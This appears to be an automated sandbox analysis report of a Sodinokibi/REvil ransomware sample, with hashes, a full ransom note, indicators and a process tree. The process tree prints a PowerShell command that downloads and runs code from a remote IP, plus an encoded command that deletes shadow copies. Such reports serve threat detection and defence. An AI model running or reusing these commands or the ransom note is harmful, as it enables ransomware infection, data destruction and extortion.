Analysis

  • max time kernel
    138s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    16-03-2020 15:10

General

  • Target

    bsJBkqPK.bat

  • Size

    193B

  • MD5

    99929ffc8e13387f5a71dd140dc6450b

  • SHA1

    1bdbc579995fbb2a567d20294cc6004c7d4b8419

  • SHA256

    205f308559944742c73835ecd74a524acfdb102c9fa1ff5635416d257c7493aa

  • SHA512

    6c686c8b1d6ad362012f9dc2c35947e0f856d4e177c6d1403d4b47d0f48c0a5c1c4a96a69621301b7d2daf7706872dc83d53daa2edf1842972834bfdeb672602

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/bsJBkqPK

Extracted

Path

C:\0716t-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 0716t. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0A9DDAF5424AC687 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/0A9DDAF5424AC687 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: E0AXwBmE8hySnKwwOLJ4fCLPP8II1JYCRGmP2+pSNxcdqEAu6qD/ImaZsfX2CGy4 mX1OFq75SSm9pAsxJgWtjyzNjFXFLne8gNdzxAhl1VYUwDtnd4o95kRqBH2QqMbr nw6djxGNZJ21p0MyOyPK0fAZSJxjThBepvJQrTBCEYbVFYBJFUzSt0YdcxNjAN0Q 1HBzzNpbGt7Tmq0rKxdJCdoac63WJMNyCRTNDRbiPmiiWNylhx4nc/+mRq14u48/ 6Z4kDHpC6Um25II/pe9N/k0abu/BwHj+zH5kD7WRNslC9v9rFKuYYzEn7OjNEi3I k9sB3fXzF5NnJBRAD+zmeUGDJCsl7qR2clNXDFOCFYS5GV7W8YVk0T00quDhdPZe 1fnC2eNCmDf8zwkgHSTPphAcfCSmH9u7o0QgoEgi6NClVhUTEzBEiwlCenNzqbTa ECkqB58TcJ2NRQf6Jf4OoJb7uiPGZeSH8vqLGKYDaACywXCEpzLQf6Lsv7dXbRqw meqGQk3L/qcSOS4GGVsdOJfhiBLWAep4PSvJiux2GFtYXMD9EDXo5Xxha9KgdQ6U vTgvpMxzZkmv6IU3Ba9HTYaCDQOQwRohRfd8yiGjHSex6zVZYCG5oaZht2/YeTaQ +XO6nan0+JhzfQ4UEunkGgAYMtZki9wITPrRFt3vSzeXw3Z0s6Qy08EXk+d+18NF GvEt+BcCWtiFL7BskKIxC9DNm69rIHBF4A7XaJnFUoS9gK6g0rpZIwuSq5tJatk7 PTjJkUtdwi8w9Na5eKW1qMoF0PqU0pRYCV2bknmgChGSj3e+NRtBoT8zEaBcFVvS eG6HrkrER4Oo7WvXiRLHHEXtOV9dAL2N+akLOEjVI2B0t1xkrskmKaF8nMlB7c5s /OdCt2x/+dDwvFU0BSp/LiwYEOY8xtfF7OBd65hqI+m/tOaTbf9UniMhj36P72lJ u1iX+a5qtzgt8WUIXpJW36K85dlhaOrgS0XMOMXgN5p8ttgJx0hq+Zh539Nk8gFk srq7gXqC+eleXSne6a3l5wDEJU13bisRoTuxgPDBcGYqS4AFggD4ybw3fMMKw3nU PJFKBGx9Q9fovIjf6rkLlwBcNBpxSpHTgWzFBe7K4LUJKwDHomH1cLDjbzpZEr61 j0wQTAldZt1qppRY1DSGJ/7y4t+pYV30GJCFDahV2P1TxnEY7UMxhUteZmjLr7Y8 B/Vs2ZwXbqQzO9qEqcZxr6U78pBLie/Mb2z77gRDoXOEXJ7rShRfTneIrhxkE4TX 17YjHgzlEYeUTlZs2Iddw5EteMSEjW/YScCThUdr Extension name: 0716t ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0A9DDAF5424AC687

http://decryptor.cc/0A9DDAF5424AC687

Signatures

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Blacklisted process makes network request 100 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\bsJBkqPK.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1908
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bsJBkqPK');Invoke-IYPAVFFMNH;Start-Sleep -s 10000"
      2⤵
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Drops file in System32 directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Discovering connected drives
      • Drops file in Program Files directory
      PID:1932
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:2036
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1436

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/1932-12-0x0000000008FF0000-0x0000000009375000-memory.dmp

    Filesize

    3.5MB